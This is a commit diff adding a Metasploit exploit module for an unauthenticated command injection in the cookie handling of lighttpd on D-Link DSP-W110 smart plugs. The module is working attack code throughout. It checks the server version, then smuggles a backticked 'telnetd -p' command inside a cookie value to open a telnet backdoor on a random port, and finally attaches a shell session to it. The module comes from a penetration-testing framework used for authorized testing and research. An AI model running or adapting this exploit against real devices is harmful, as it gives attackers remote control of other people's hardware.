dsp-w110-command-injection

Michael Messner · Michael Messner · commit 1b040f337425 · 2015-06-13T21:45:56.000+02:00
diff --git a/modules/exploits/linux/http/dlink_dspw100_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw100_cookie_noauth_exec.rb
@@ -0,0 +1,119 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::CommandShell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'D-Link Cookie Command Execution',
+      'Description'    => %q{
+        This module exploits an anonymous remote code execution vulnerability on different D-Link
+        devices. The vulnerability is a command injection in the cookie handling process of the
+        lighttpd web server when handling specially crafted cookie values. This module has been
+        successfully tested on D-Link DSP-W110A1_FW105B01 in an emulated environment.
+      },
+      'Author'         =>
+        [
+          'Peter Adkins',   # vulnerability discovery and initial PoC
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'linux',
+      'References'     =>
+        [
+          ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
+        ],
+      'DisclosureDate' => 'Jun 12 2015',
+      'Targets' =>
+        [
+          [ 'Automatic',        { } ]
+        ],
+      'DefaultTarget'    => 0
+      ))
+
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri'    => '/',
+        'method' => 'GET',
+      })
+
+      if res && res.headers["Server"] =~ /lighttpd\/1.4.34/
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the device ...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+    end
+
+    print_status("#{peer} - Exploiting...")
+
+    telnetport = rand(32767) + 32768
+
+    cmd = "telnetd -p #{telnetport}"
+
+    execute_command(cmd)
+
+    handle_telnet(telnetport)
+  end
+
+  def handle_telnet(telnetport)
+
+    begin
+      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+
+      if sock
+        print_good("#{peer} - Backdoor service spawned")
+        add_socket(sock)
+      else
+        fail_with(Failure::Unreachable, "#{peer} - Backdoor service not spawned")
+      end
+
+      print_status "Starting a Telnet session #{rhost}:#{telnetport}"
+      merge_me = {
+        'USERPASS_FILE' => nil,
+        'USER_FILE'     => nil,
+        'PASS_FILE'     => nil,
+        'USERNAME'      => nil,
+        'PASSWORD'      => nil
+      }
+      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
+    rescue
+      fail_with(Failure::Unreachable, "#{peer} - Backdoor service not handled")
+    end
+    return
+  end
+
+  def execute_command(cmd)
+
+    begin
+      res = send_request_cgi({
+        'method'        => 'GET',
+        'uri'           => "/",
+        'cookie'        => "i=`#{cmd}`"
+      }, 5)
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end
